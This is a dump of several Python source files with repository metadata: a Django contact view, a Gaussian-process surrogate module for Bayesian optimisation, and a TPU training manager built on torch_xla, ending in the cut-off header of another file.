a24a44290243b8973c58ac83bd9c32d62a1b7331 | 194 | py | Python | contact/views.py | rsHalford/xhalford-django | 970875bbcd23782af15f24361ec3bbda0230ee81 | ["MIT"] | 2 | 2020-11-02T22:04:01.000Z | 2020-11-14T14:45:45.000Z | contact/views.py | rsHalford/xhalford-django | 970875bbcd23782af15f24361ec3bbda0230ee81 | ["MIT"] | null | null | null | contact/views.py | rsHalford/xhalford-django | 970875bbcd23782af15f24361ec3bbda0230ee81 | ["MIT"] | null | null | null |
from django.shortcuts import render
from django.views.generic import ListView
from contact.models import Profile
class Contact(ListView):
model = Profile
template_name = "contact.html"
| 24.25 | 41 | 0.78866 | 79 | 0.407216 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.072165 |
a24b77db8e7a819628a9ae74f4884a124de6d7df | 24,382 | py | Python | xbbo/surrogate/gaussian_process.py | zhanglei1172/bbobenchmark | 841bffdddc1320ac2676e378d20f8b176a7e6cf7 | ["MIT"] | 2 | 2021-09-06T02:06:22.000Z | 2021-12-09T10:46:56.000Z | xbbo/surrogate/gaussian_process.py | zhanglei1172/bbobenchmark | 841bffdddc1320ac2676e378d20f8b176a7e6cf7 | ["MIT"] | null | null | null | xbbo/surrogate/gaussian_process.py | zhanglei1172/bbobenchmark | 841bffdddc1320ac2676e378d20f8b176a7e6cf7 | ["MIT"] | null | null | null |
from typing import List
import typing
from scipy import optimize
import sklearn
# from sklearn.gaussian_process import kernels
from sklearn.gaussian_process.kernels import Kernel, KernelOperator
import torch  # used by GaussianProcessRegressorARD_torch below
from scipy.linalg import solve_triangular, cholesky  # used by GaussianProcessRegressor below
from scipy import stats  # used by GaussianTransform.z_transform
import numpy as np
import GPy  # used by GaussianProcessRegressorARD_gpy below
from sklearn import gaussian_process
# from botorch.acquisition import ExpectedImprovement
from xbbo.surrogate.base import Surrogate, BaseGP
from xbbo.surrogate.gp_kernels import HammingKernel, Matern, ConstantKernel, WhiteKernel
from xbbo.surrogate.gp_prior import HorseshoePrior, LognormalPrior, Prior, SoftTopHatPrior, TophatPrior
from xbbo.utils.util import get_types
VERY_SMALL_NUMBER = 1e-10
class GaussianTransform:
"""
Transform data into Gaussian by applying psi = Phi^{-1} o F where F is the truncated ECDF.
:param y: shape (n, dim)
"""
def __init__(self, y: np.array):
assert y.ndim == 2
self.dim = y.shape[1]
self.sorted = y.copy()
self.sorted.sort(axis=0)
@staticmethod
def z_transform(series, values_sorted=None):
# applies truncated ECDF then inverse Gaussian CDF.
if values_sorted is None:
values_sorted = sorted(series)
def winsorized_delta(n):
return 1.0 / (4.0 * n**0.25 * np.sqrt(np.pi * np.log(n)))
delta = winsorized_delta(len(series))
def quantile(values_sorted, values_to_insert, delta):
res = np.searchsorted(values_sorted,
values_to_insert) / len(values_sorted)
return np.clip(res, a_min=delta, a_max=1 - delta)
quantiles = quantile(values_sorted, series, delta)
quantiles = np.clip(quantiles, a_min=delta, a_max=1 - delta)
return stats.norm.ppf(quantiles)
def transform(self, y: np.array):
"""
:param y: shape (n, dim)
:return: shape (n, dim), distributed along a normal
"""
assert y.shape[1] == self.dim
# compute truncated quantile, apply gaussian inv cdf
return np.stack([
self.z_transform(y[:, i], self.sorted[:, i])
for i in range(self.dim)
]).T
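# Illustrative use of GaussianTransform (hedged sketch): map a skewed sample
# to approximately standard-normal rank scores.
#   y = np.random.exponential(size=(100, 1))
#   z = GaussianTransform(y).transform(y)  # z is roughly N(0, 1) per column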
class StandardTransform:
def __init__(self, y: np.array):
assert y.ndim == 2
self.dim = y.shape[1]
self.mean = y.mean(axis=0, keepdims=True)
self.std = y.std(axis=0, keepdims=True)
def transform(self, y: np.array):
z = (y - self.mean) / np.clip(self.std, a_min=0.001, a_max=None)
return z
class SEkernel():
def __init__(self):
self.initialize()
def initialize(self):
# self.sumF = 0.001
# self.sumL = 0.001
# self.sumY = 0.001
self.sigma_f = 1
        self.sigma_l = 1  # TODO: this was previously set to 1
self.sigma_y = 0.001
def compute_kernel(self, x1, x2=None):
if x2 is None:
x2 = x1
x2 = np.atleast_2d(x2)
x1 = np.atleast_2d(x1)
# noise = np.diag([self.sigma_y**2 for _ in range(x1.shape[0])])
noise = np.eye(x1.shape[0]) * self.sigma_y**2
else:
x2 = np.atleast_2d(x2)
x1 = np.atleast_2d(x1)
noise = 0
dist_matrix = np.sum(x1**2, 1).reshape(-1, 1) + np.sum(
x2**2, 1) - 2 * (x1 @ x2.T)
return self.sigma_f**2 * np.exp(
-0.5 / self.sigma_l**2 * dist_matrix) + noise
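# Worked example for the squared-exponential kernel above (illustrative):
# with sigma_f = sigma_l = 1 and scalar inputs x1 = 0, x2 = 1, the kernel
# value is exp(-0.5 * 1) ~= 0.6065; when x2 is None, a diagonal noise term
# sigma_y**2 = 1e-6 is added instead.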
class GaussianProcessRegressorARD_gpy(Surrogate):
def __init__(self, dim, min_sample=3):
super(GaussianProcessRegressorARD_gpy, self).__init__(dim, min_sample)
self.cached = {}
self.cached_mu_sigma = {}
self.cached_mu_cov = {}
self.kernel = GPy.kern.Matern52(input_dim=dim, ARD=True)
# self.kernel = GPy.kern.RBF(input_dim=self.dim,
# variance=0.001,
# lengthscale=0.5,
# ARD=True)
self.is_fited = False
self.standardlize = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.is_fited = True
y = np.asarray(y)
if self.standardlize:
self.Y_mean = y.mean()
self.Y_std = y.std()
else:
self.Y_mean = 0
self.Y_std = 1
y = (y - self.Y_mean) / self.Y_std
self.gpr = GPy.models.gp_regression.GPRegression(x, y, self.kernel)
self.gpr.optimize(max_iters=100)
# self.kernel = self.gpr.kern
def predict(self, newX):
assert self.is_fited
return np.squeeze(self.gpr.predict(
np.atleast_2d(newX))[0]) * self.Y_std + self.Y_mean
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key in self.cached_mu_sigma:
return self.cached_mu_sigma[key][0]
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, std = self.gpr.predict(np.atleast_2d(newX), full_cov=True)
return np.squeeze(mu) * self.Y_std + self.Y_mean, np.squeeze(
np.sqrt(std)) * self.Y_std
def cached_predict_with_sigma(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_sigma[key] = self.predict_with_sigma(newX)
return self.cached_mu_sigma[key]
def predict_with_cov(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, cov = self.gpr.predict(np.atleast_2d(newX), full_cov=True)
return np.squeeze(mu) * self.Y_std + self.Y_mean, np.squeeze(
cov) * self.Y_std**2
def cached_predict_with_cov(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_cov[key] = self.predict_with_cov(newX)
return self.cached_mu_cov[key]
class GPR_sklearn(BaseGP):
def __init__(
self,
cs,
# min_sample=3,
# alpha=0,
rng=np.random.RandomState(0),
n_opt_restarts: int = 10,
instance_features: typing.Optional[np.ndarray] = None,
pca_components: typing.Optional[int] = None,
**kwargs
):
types, bounds = get_types(cs)
# self.cached = {}
super(GPR_sklearn, self).__init__(cs, types, bounds, rng,instance_features=instance_features,
pca_components=pca_components,**kwargs)
self.is_fited = False
# self.alpha = alpha # Fix RBF kernel error
self.n_opt_restarts = n_opt_restarts
self._n_ll_evals = 0
self._set_has_conditions()
def _get_kernel(self, ):
cov_amp = ConstantKernel(
2.0,
constant_value_bounds=(np.exp(-10), np.exp(2)),
prior=LognormalPrior(mean=0.0, sigma=1.0, rng=self.rng),
)
cont_dims = np.where(np.array(self.types) == 0)[0]
cat_dims = np.where(np.array(self.types) != 0)[0]
if len(cont_dims) > 0:
exp_kernel = Matern(
np.ones([len(cont_dims)]),
[(np.exp(-6.754111155189306), np.exp(0.0858637988771976))
for _ in range(len(cont_dims))],
nu=2.5,
operate_on=cont_dims,
)
if len(cat_dims) > 0:
ham_kernel = HammingKernel(
np.ones([len(cat_dims)]),
[(np.exp(-6.754111155189306), np.exp(0.0858637988771976))
for _ in range(len(cat_dims))],
operate_on=cat_dims,
)
# assert (len(cont_dims) + len(cat_dims)) == len(
# scenario.cs.get_hyperparameters())
noise_kernel = WhiteKernel(
noise_level=1e-8,
noise_level_bounds=(np.exp(-25), np.exp(2)),
prior=HorseshoePrior(scale=0.1, rng=self.rng),
)
if len(cont_dims) > 0 and len(cat_dims) > 0:
# both
kernel = cov_amp * (exp_kernel * ham_kernel) + noise_kernel
elif len(cont_dims) > 0 and len(cat_dims) == 0:
# only cont
kernel = cov_amp * exp_kernel + noise_kernel
elif len(cont_dims) == 0 and len(cat_dims) > 0:
# only cont
kernel = cov_amp * ham_kernel + noise_kernel
else:
raise ValueError()
# kernel = gaussian_process.kernels.ConstantKernel(
# constant_value=1 #, constant_value_bounds=(1e-4, 1e4)
# ) * gaussian_process.kernels.RBF(
# length_scale=1 #, length_scale_bounds=(1e-4, 1e4)
# )
return kernel
def _predict(self,
X_test,
cov_return_type: typing.Optional[str] = 'diagonal_cov'):
        r'''
        return: \mu, \sigma^2
        '''
assert self.is_fited
X_test = self._impute_inactive(X_test)
if cov_return_type is None:
mu = self.gp.predict(X_test)
var = None
if self.normalize_y:
mu = self._untransform_y(mu)
else:
predict_kwargs = {'return_cov': False, 'return_std': True}
if cov_return_type == 'full_cov':
predict_kwargs = {'return_cov': True, 'return_std': False}
mu, var = self.gp.predict(X_test, **predict_kwargs)
if cov_return_type != 'full_cov':
var = var**2 # since we get standard deviation for faster computation
# Clip negative variances and set them to the smallest
# positive float value
var = np.clip(var, VERY_SMALL_NUMBER, np.inf)
if self.normalize_y:
mu, var = self._untransform_y(mu, var)
if cov_return_type == 'diagonal_std':
var = np.sqrt(
var) # converting variance to std deviation if specified
return mu, var
def _get_gp(self) -> gaussian_process.GaussianProcessRegressor:
return gaussian_process.GaussianProcessRegressor(
kernel=self.kernel,
normalize_y=False,
optimizer=None,
n_restarts_optimizer=
-1, # Do not use scikit-learn's optimization routine
alpha=0, # Governed by the kernel
random_state=self.rng,
)
def _nll(self, theta: np.ndarray) -> typing.Tuple[float, np.ndarray]:
"""
Returns the negative marginal log likelihood (+ the prior) for
a hyperparameter configuration theta.
(negative because we use scipy minimize for optimization)
Parameters
----------
theta : np.ndarray(H)
Hyperparameter vector. Note that all hyperparameter are
on a log scale.
Returns
----------
float
lnlikelihood + prior
"""
self._n_ll_evals += 1
try:
lml, grad = self.gp.log_marginal_likelihood(theta, eval_gradient=True)
except np.linalg.LinAlgError:
return 1e25, np.zeros(theta.shape)
for dim, priors in enumerate(self._all_priors):
for prior in priors:
lml += prior.lnprob(theta[dim])
grad[dim] += prior.gradient(theta[dim])
# We add a minus here because scipy is minimizing
if not np.isfinite(lml).all() or not np.all(np.isfinite(grad)):
return 1e25, np.zeros(theta.shape)
else:
return -lml, -grad
def _train(self, X: np.ndarray, y: np.ndarray, **kwargs):
X = np.atleast_2d(X)
X = self._impute_inactive(X)
if self.normalize_y:
y = self._normalize_y(y)
if len(y.shape) == 1:
self.n_objectives_ = 1
else:
self.n_objectives_ = y.shape[1]
if self.n_objectives_ == 1:
y = y.flatten()
n_tries = 10
for i in range(n_tries):
try:
self.gp = self._get_gp() # new model
self.gp.fit(X, y)
break
except np.linalg.LinAlgError as e:
                if i == n_tries - 1:
raise e
# Assume that the last entry of theta is the noise
theta = np.exp(self.kernel.theta)
theta[-1] += 1
self.kernel.theta = np.log(theta)
if self.do_optimize:
self._all_priors = self._get_all_priors(add_bound_priors=False)
self.hypers = self._optimize()
self.gp.kernel.theta = self.hypers
self.gp.fit(X, y)
else:
self.hypers = self.gp.kernel.theta
self.is_fited = True
def _get_all_priors(
self,
add_bound_priors: bool = True,
add_soft_bounds: bool = False,
) -> List[List[Prior]]:
# Obtain a list of all priors for each tunable hyperparameter of the kernel
all_priors = []
to_visit = []
to_visit.append(self.gp.kernel.k1)
to_visit.append(self.gp.kernel.k2)
while len(to_visit) > 0:
current_param = to_visit.pop(0)
if isinstance(current_param, KernelOperator):
to_visit.insert(0, current_param.k1)
to_visit.insert(1, current_param.k2)
continue
elif isinstance(current_param, Kernel):
hps = current_param.hyperparameters
assert len(hps) == 1
hp = hps[0]
if hp.fixed:
continue
bounds = hps[0].bounds
for i in range(hps[0].n_elements):
priors_for_hp = []
if current_param.prior is not None:
priors_for_hp.append(current_param.prior)
if add_bound_priors:
if add_soft_bounds:
priors_for_hp.append(
SoftTopHatPrior(
lower_bound=bounds[i][0],
upper_bound=bounds[i][1],
rng=self.rng,
exponent=2,
))
else:
priors_for_hp.append(
TophatPrior(
lower_bound=bounds[i][0],
upper_bound=bounds[i][1],
rng=self.rng,
))
all_priors.append(priors_for_hp)
return all_priors
def _optimize(self) -> np.ndarray:
"""
Optimizes the marginal log likelihood and returns the best found
hyperparameter configuration theta.
Returns
-------
theta : np.ndarray(H)
Hyperparameter vector that maximizes the marginal log likelihood
"""
log_bounds = [(b[0], b[1]) for b in self.gp.kernel.bounds]
# Start optimization from the previous hyperparameter configuration
p0 = [self.gp.kernel.theta]
if self.n_opt_restarts > 0:
dim_samples = []
prior = None # type: typing.Optional[typing.Union[typing.List[Prior], Prior]]
for dim, hp_bound in enumerate(log_bounds):
prior = self._all_priors[dim]
# Always sample from the first prior
if isinstance(prior, list):
if len(prior) == 0:
prior = None
else:
prior = prior[0]
prior = typing.cast(typing.Optional[Prior], prior)
if prior is None:
try:
sample = self.rng.uniform(
low=hp_bound[0],
high=hp_bound[1],
size=(self.n_opt_restarts, ),
)
except OverflowError:
raise ValueError(
'OverflowError while sampling from (%f, %f)' %
(hp_bound[0], hp_bound[1]))
dim_samples.append(sample.flatten())
else:
dim_samples.append(
prior.sample_from_prior(self.n_opt_restarts).flatten())
p0 += list(np.vstack(dim_samples).transpose())
theta_star = None
f_opt_star = np.inf
for i, start_point in enumerate(p0):
theta, f_opt, _ = optimize.fmin_l_bfgs_b(self._nll,
start_point,
bounds=log_bounds)
if f_opt < f_opt_star:
f_opt_star = f_opt
theta_star = theta
return theta_star
def _set_has_conditions(self) -> None:
has_conditions = len(self.configspace.get_conditions()) > 0
to_visit = []
to_visit.append(self.kernel)
while len(to_visit) > 0:
current_param = to_visit.pop(0)
if isinstance(current_param,
sklearn.gaussian_process.kernels.KernelOperator):
to_visit.insert(0, current_param.k1)
to_visit.insert(1, current_param.k2)
current_param.has_conditions = has_conditions
elif isinstance(current_param,
sklearn.gaussian_process.kernels.Kernel):
current_param.has_conditions = has_conditions
else:
raise ValueError(current_param)
class GaussianProcessRegressorARD_sklearn(Surrogate):
def __init__(self, dim, min_sample=3):
super(GaussianProcessRegressorARD_sklearn,
self).__init__(dim, min_sample)
self.cached = {}
kernel = gaussian_process.kernels.ConstantKernel(
constant_value=1 #, constant_value_bounds=(1e-4, 1e4)
) * gaussian_process.kernels.RBF(
length_scale=1 #, length_scale_bounds=(1e-4, 1e4)
)
self.gpr = gaussian_process.GaussianProcessRegressor(
kernel=kernel, n_restarts_optimizer=2)
self.is_fited = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.gpr.fit(x, y)
self.is_fited = True
def predict(self, newX):
assert self.is_fited
return self.gpr.predict(np.atleast_2d(newX))
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, std = self.gpr.predict(np.atleast_2d(newX), return_std=True)
return mu, std
class GaussianProcessRegressor(Surrogate):
def __init__(self, dim, min_sample=3):
super().__init__(dim, min_sample)
self.kernel = SEkernel()
self.cached = {}
self.cached_mu_sigma = {}
self.cached_mu_cov = {}
self.is_fited = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.is_fited = True
self.X = x
kernel = self.kernel.compute_kernel(x)
self.L = cholesky(kernel, lower=True)
_part = solve_triangular(self.L, y, lower=True)
self.KinvY = solve_triangular(self.L.T, _part, lower=False)
def predict(self, newX):
assert self.is_fited
# Kstar = np.squeeze(self.kernel.compute_kernel(self.X, newX))
Kstar = (self.kernel.compute_kernel(self.X, newX))
return (Kstar.T @ self.KinvY).item()
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not hasattr(self, 'X'):
return 0, np.inf
else:
Kstar = self.kernel.compute_kernel(self.X, newX)
_LinvKstar = solve_triangular(self.L, Kstar, lower=True)
return np.squeeze(Kstar.T @ self.KinvY), np.sqrt(
self.kernel.compute_kernel(newX) - _LinvKstar.T @ _LinvKstar)
def cached_predict_with_sigma(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_sigma[key] = self.predict_with_sigma(newX)
return self.cached_mu_sigma[key]
def cached_predict_with_cov(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_cov:
self.cached_mu_cov[key] = self.predict_with_cov(newX)
return self.cached_mu_cov[key]
def predict_with_cov(self, newX):
assert self.is_fited
if not hasattr(self, 'X'):
return 0, np.inf
else:
Kstar = self.kernel.compute_kernel(self.X, newX)
_LinvKstar = solve_triangular(self.L, Kstar, lower=True)
return np.squeeze(
Kstar.T @ self.KinvY), (self.kernel.compute_kernel(newX) -
_LinvKstar.T @ _LinvKstar)
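# Illustrative sketch (not part of the original file): fit the plain
# GaussianProcessRegressor above on a 1-D toy problem and query it. Assumes
# `cholesky` and `solve_triangular` from scipy.linalg are imported at the top.
def _demo_plain_gp():
    x_train = np.linspace(0.0, 1.0, 10).reshape(-1, 1)
    y_train = np.sin(2 * np.pi * x_train).ravel()
    gp = GaussianProcessRegressor(dim=1)
    gp.fit(x_train, y_train)
    mu, sigma = gp.predict_with_sigma(np.array([[0.25]]))
    return mu, sigma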
class GaussianProcessRegressorARD_torch(Surrogate):
def __init__(self, dim, min_sample=4, name='standard'):
from botorch.models import SingleTaskGP, FixedNoiseGP
from botorch import fit_gpytorch_model
from botorch.optim import optimize_acqf
from gpytorch import ExactMarginalLogLikelihood
from gpytorch.likelihoods import GaussianLikelihood
from gpytorch.constraints import GreaterThan
Surrogate.__init__(self, dim, min_sample)
# self.cached = {}
# self.cached_mu_sigma = {}
# self.cached_mu_cov = {}
self.is_fited = False
assert name in ["standard", "gaussian"]
mapping = {
"standard": StandardTransform,
"gaussian": GaussianTransform,
}
self.normalizer = mapping[name]
# self.observed_z = torch.empty(size=(0, dim))
self.y_observed = torch.empty(size=(0, 1))
self.X_observed = torch.empty(size=(0, dim))
    def transform_outputs(self, y: np.ndarray):
# return y # TODO
psi = self.normalizer(y)
z = psi.transform(y)
return z
    def fit(self, x, y):
        # the botorch/gpytorch imports in __init__ are function-local, so the
        # names used below are imported here as well
        from botorch.models import FixedNoiseGP
        from botorch import fit_gpytorch_model
        from gpytorch import ExactMarginalLogLikelihood
self.X_observed = torch.cat((self.X_observed, torch.Tensor(x)), dim=0)
self.y_observed = torch.cat(
(self.y_observed, torch.Tensor(y).unsqueeze(1)), dim=0)
# x = torch.atleast_2d(x)
if self.X_observed.shape[-2] < self.min_sample:
return
self.is_fited = True
# if y.ndim == 1:
# y = y[..., None]
self.z_observed = torch.Tensor(
self.transform_outputs(self.y_observed.cpu().numpy()))
# self.gpr = SingleTaskGP(
# train_X=self.X_observed,
# train_Y=self.z_observed,
# # special likelihood for numerical Cholesky errors, following advice from
# # https://www.gitmemory.com/issue/pytorch/botorch/179/506276521
# # likelihood=GaussianLikelihood(noise_constraint=GreaterThan(1e-3)),
# )
self.gpr = FixedNoiseGP(
train_X=self.X_observed,
train_Y=self.z_observed,
train_Yvar=torch.full_like(self.z_observed, 1)
# special likelihood for numerical Cholesky errors, following advice from
# https://www.gitmemory.com/issue/pytorch/botorch/179/506276521
# likelihood=GaussianLikelihood(noise_constraint=GreaterThan(1e-3)),
)
mll = ExactMarginalLogLikelihood(self.gpr.likelihood, self.gpr)
# with gpytorch.settings.cholesky_jitter(1e-1):
fit_gpytorch_model(mll)
def get_posterior(self, newX):
assert self.is_fited
return self.gpr.posterior(torch.atleast_2d(newX))
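# --- Editorial usage sketch (not part of the original module) ---
# Minimal illustration of the shared Surrogate fit/predict protocol, assuming the
# Surrogate base class takes (dim, min_sample) as the constructors above suggest
# and that numpy is already imported as np in this module.
if __name__ == "__main__":
    _surrogate = GaussianProcessRegressorARD_sklearn(dim=2, min_sample=3)
    _X = np.random.rand(8, 2)
    _y = np.sin(_X).sum(axis=1)
    _surrogate.fit(_X, _y)
    _mu, _sigma = _surrogate.predict_with_sigma(_X[:1])
    print(_mu, _sigma)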
| 36.014771
| 103
| 0.56029
| 23,636
| 0.969006
| 0
| 0
| 769
| 0.031527
| 0
| 0
| 3,759
| 0.154108
|
a24baed065a08f05a3618b4b5c209c85239d1882
| 10,112
|
py
|
Python
|
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
lib/training/tpu.py
|
learning-at-home/dalle
|
acf688eac206a6bcd543d56ddbb9dcf6bb72012b
|
[
"MIT"
] | null | null | null |
import ctypes
import threading
from functools import partial
from contextlib import nullcontext
from copy import deepcopy
import multiprocessing as mp
from itertools import zip_longest
from typing import Iterable
import torch
import torch.nn as nn
import torch.utils.data
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
import torch_xla.distributed.parallel_loader as pl
from hivemind.utils.logging import get_logger
logger = get_logger(__name__)
class TPUManager(mp.Process):
"""Auxiliary class that manages model training over an array of TPU cores"""
def __init__(self,
model,
dataset,
*,
collate_fn: callable = None,
nprocs: int = 8,
prefetch: int = 16,
batch_size_per_device: int = 1,
grad_accumulation_steps: int = 1,
seed_base: int = 42,
start: bool):
super().__init__()
self.lock = mp.Lock()
self.nprocs, self.prefetch, self.seed_base = nprocs, prefetch, seed_base
self.batch_size_per_device, self.grad_accumulation_steps = batch_size_per_device, grad_accumulation_steps
self.collate_fn = collate_fn
self.step_triggered, self.step_finished = mp.Event(), mp.Event()
self._synchronizer = TPUSynchronizer(model)
self._data_manager = TPUDataManager(dataset, nprocs, prefetch)
# shared fields for communicating statistics after each step
self.should_load_parameters = mp.Value(ctypes.c_bool, False)
self.gradients_accumulated = mp.Value(ctypes.c_long, 0)
self.loss_accumulated = mp.Value(ctypes.c_double, 0)
if start:
self.start()
def run(self):
thread = threading.Thread(
target=partial(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork'),
daemon=True)
thread.start()
thread.join()
def update_model_parameters(self, new_host_parameters):
"""Schedule TPUs to update model parameters during at the beginning of the next step"""
with self.lock, torch.no_grad():
self._synchronizer.set_host_parameters(new_host_parameters)
self.should_load_parameters.value = True
def get_aggregated_gradients(self):
"""Get current accumulated gradients from the master model"""
with self.lock, torch.no_grad():
return self._synchronizer.get_aggregated_gradients()
def zero_grad(self):
"""Reset master accumulated gradients to zeros"""
with self.lock, torch.no_grad():
for param in self._synchronizer.master_model.parameters():
param.grad.zero_()
def step(self):
"""run forward/backward step with all TPUs, collect gradients"""
self.loss_accumulated.value = self.gradients_accumulated.value = 0
self.step_finished.clear()
self.step_triggered.set()
self.step_finished.wait()
return self.loss_accumulated.value, self.gradients_accumulated.value
def runner(self, tpu_index):
"""Run training steps from the perspective of a single TPU core"""
# acquire the (unique) Cloud TPU core corresponding to this process's index
device = xm.xla_device()
logger.info(f"Process {tpu_index} is using {xm.xla_real_devices([str(device)])[0]}")
        # set a distinct random seed for each TPU process
torch.manual_seed(self.seed_base + tpu_index)
# use staged init to minimize peak RAM usage
for init_index in range(xm.xrt_world_size()):
xm.rendezvous(f'init_{init_index}')
if tpu_index == init_index:
model = self._synchronizer.get_device_model_replica(device)
data_loader = self._data_manager.get_device_dataloader(
batch_size=self.batch_size_per_device, num_workers=0, collate_fn=self.collate_fn, pin_memory=False)
data_loader_iter = iter(data_loader)
logger.info(f"Process {tpu_index} initialized.")
xm.rendezvous('init_finished')
while True:
self.step_triggered.wait()
xm.rendezvous('before_step')
if xm.is_master_ordinal():
self.step_triggered.clear()
if bool(self.should_load_parameters.value):
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.send_params_to_device(model)
self.should_load_parameters.value = False
### compute loss and gradients
loss = 0.0
for i in range(self.grad_accumulation_steps):
inputs = next(data_loader_iter)
outputs = model(**inputs)
loss_i = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
loss_i = loss_i / (self.grad_accumulation_steps * self.nprocs)
loss_i.backward()
loss += loss_i
del inputs, outputs, loss_i
### aggregate gradients from TPUs
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.aggregate_grads_on_host(model, add=True)
# clear aggregated gradients from all devices
model.zero_grad()
### accumulate statistics to host
loss = xm.all_reduce(xm.REDUCE_SUM, loss, scale=1.0)
xm.do_on_ordinals(self._mark_step_finished, data=(loss,), ordinals=(0,))
def _mark_step_finished(self, loss):
self.gradients_accumulated.value = self.batch_size_per_device * self.nprocs * self.grad_accumulation_steps
self.loss_accumulated.value = float(loss)
self.step_finished.set()
class TPUSynchronizer:
"""An auxiliary class for manipulating parameters and gradients without producing a ton of XLA graphs"""
def __init__(self, model: nn.Module):
self.master_model = model.share_memory()
for param in self.master_model.parameters():
if param.grad is None:
param.grad = torch.zeros_like(param)
param.grad = param.grad.share_memory_()
def get_device_model_replica(self, device: torch.device, tie_weights: bool = True):
replica = deepcopy(self.master_model).to(device)
if tie_weights:
replica.tie_weights()
for param in replica.parameters():
param.grad = torch.zeros_like(param, device=device)
return replica
def set_host_parameters(self, new_host_parameters):
        return self._assign(source=new_host_parameters, target=self.master_model.parameters(), add=False, strict=True)
def get_aggregated_gradients(self):
return [param.grad for param in self.master_model.parameters()]
def send_params_to_device(self, replica: nn.Module):
"""Copy params from master_model to this device_model replica"""
with torch.no_grad():
replica_params = list(replica.parameters())
master_params = list(self.master_model.parameters())
master_params = xm.send_cpu_data_to_device(master_params, xm.xla_device())
self._assign(source=master_params, target=replica_params, add=False)
xm.rendezvous("params_replicated")
def aggregate_grads_on_host(self, replica: nn.Module, *, add: bool):
"""Aggregate grads from all tpu devices and move them to host"""
with torch.no_grad():
replica_grads = [param.grad for param in replica.parameters()]
replica_grads = xm.all_reduce(xm.REDUCE_SUM, replica_grads, scale=1.0)
master_grads = [hp.grad for hp in self.master_model.parameters()]
xm.do_on_ordinals(lambda *replica_grads: self._assign(source=replica_grads, target=master_grads, add=add),
data=tuple(replica_grads), ordinals=(0,))
# ^-- do_on_ordinals already runs rendezvous at the end
def _assign(self, source: Iterable[torch.Tensor], target: Iterable[torch.Tensor], add: bool, strict: bool = False):
for source_tensor, target_tensor in zip_longest(source, target):
            assert source_tensor is not None and target_tensor is not None, "Source and target length must match exactly"
if strict:
assert source_tensor.shape == target_tensor.shape
assert source_tensor.device == target_tensor.device
assert source_tensor.dtype == target_tensor.dtype
if add:
target_tensor.add_(source_tensor)
else:
target_tensor.copy_(source_tensor)
class TPUDataManager:
"""An auxiliary class that loads centralized dataset from master into multiple TPU devices"""
def __init__(self, dataset: torch.utils.data.Dataset, nprocs: int, master_prefetch: int = 16):
self.dataset, self.nprocs = dataset, nprocs
self.device_queues = [mp.Queue(master_prefetch) for _ in range(nprocs)]
self._loader_thread = threading.Thread(target=self._load_data_into_queues)
self._loader_thread.start()
def _load_data_into_queues(self):
try:
for i, batch in enumerate(self.dataset):
self.device_queues[i % self.nprocs].put(batch)
finally:
logger.warning("Minibatch generator finished.")
def get_device_dataloader(self, **kwargs):
data_loader = torch.utils.data.DataLoader(QueueDataset(self.device_queues[xm.get_ordinal()]), **kwargs)
return pl.ParallelLoader(data_loader, [xm.xla_device()]).per_device_loader(xm.xla_device())
class QueueDataset(torch.utils.data.IterableDataset):
"""A dataset that ceaselessly iterates over a queue"""
def __init__(self, queue: mp.Queue):
super().__init__()
self.queue = queue
def __iter__(self):
while True:
yield self.queue.get()
def __len__(self):
return 10 ** 12 # TODO deprecate this when the issue is resolved: https://github.com/googlecolab/colabtools/issues/2237
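# --- Editorial usage sketch (not part of the original module) ---
# How a host-side training loop is expected to drive TPUManager; `model`,
# `make_dataset()` and `collate` are hypothetical placeholders, and running this
# requires an actual Cloud TPU environment with torch_xla installed.
#
#   manager = TPUManager(model, make_dataset(), collate_fn=collate,
#                        nprocs=8, batch_size_per_device=1, start=True)
#   loss, num_samples = manager.step()           # forward/backward on all cores
#   grads = manager.get_aggregated_gradients()   # host-side accumulated gradients
#   # ...apply an optimizer step on the host model here...
#   manager.update_model_parameters(model.parameters())
#   manager.zero_grad()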
| 43.586207
| 128
| 0.65714
| 9,603
| 0.949664
| 74
| 0.007318
| 0
| 0
| 0
| 0
| 1,542
| 0.152492
|
a24d8145f2c40687cee72c78a8cd67399721ce08
| 1,819
|
py
|
Python
|
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | 3
|
2021-01-29T16:03:39.000Z
|
2021-12-16T04:40:28.000Z
|
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | null | null | null |
code/evaluate.py
|
xuyangcao/SegWithDistMap
|
9638aaacf15dba6c2f907e5e82f8ed37a786bc96
|
[
"Apache-2.0"
] | 2
|
